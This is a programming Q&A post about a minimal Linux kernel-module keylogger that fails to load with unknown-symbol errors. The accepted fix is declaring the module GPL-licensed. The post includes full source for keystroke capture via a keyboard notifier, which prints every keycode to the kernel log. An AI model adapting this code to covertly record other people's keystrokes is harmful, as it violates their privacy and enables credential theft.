# Unknown symbol when loading my own kernel module

Tags: linux, module, kernel, symbols

The following code (pasted last), taken mostly from [here](http://www.gadgetweb.de/programming/39-how-to-building-your-own-kernel-space-keylogger.html), is a very simple kernel module which acts as a keylogger.  I can get it to compile and produce a .ko just fine, but when I try to load it, I get the following errors in dmesg:

```
[  790.833828] keylogger: Unknown symbol unregister_keyboard_notifier (err 0)
[  790.833846] keylogger: Unknown symbol register_keyboard_notifier (err 0)
```

I did not build my kernel from source, but am using the stock kernel provided with archlinux.  I did install the kernel-headers package to get the module to compile, however.

**So my question is: Are these two symbols really not found in my installed kernel?**  And if they are, why aren't they linking(?) correctly?

I can find evidence that the symbols are present.  Firstly, I can see the symbols in `/proc/kallsyms`.  Also, when I do `nm /usr/src/vmlinux` I can also see these two symbols.  Are they not the same?

Module code:

```
#include <linux/module.h>   /* Needed by all modules */
#include <linux/keyboard.h>

EXPORT_SYMBOL_NOVERS(unregister_keyboard_notifier);
EXPORT_SYMBOL_NOVERS(register_keyboard_notifier);

int hello_notify(struct notifier_block *nblock, unsigned long code, void *_param) {
    struct keyboard_notifier_param *param = _param;
    struct vc_data *vc = param->vc;

    int ret = NOTIFY_OK;

    if (code == KBD_KEYCODE) {
        printk(KERN_DEBUG "KEYLOGGER %i %s\n", param->value, (param->down ? "down" : "up"));
    }
}

static struct notifier_block nb = {
    .notifier_call = hello_notify
};

static int hello_init(void)
{
    register_keyboard_notifier(&nb);
    return 0;
}

static void hello_release(void)
{
    unregister_keyboard_notifier(&nb);
}

module_init(hello_init);
module_exit(hello_release);
```

Answer (score 4):

I needed to add the following to my module source:

```
MODULE_LICENSE("GPL");
```

Comment: [sarcasm] Glad that was well documented in the kernel source. [/sarcasm] At least I wasn't the only one who had this issue. Did you happen to find out why that one line made the difference?

Comment: I believe the line declares the module as being licensed under the GPL (or a compatible license).  You can't (legally) link non-GPL modules with GPL'd kernel source code.

Comment: Ah, that makes perfect sense, then. Kind of figured that was the reasoning, but wasn't sure.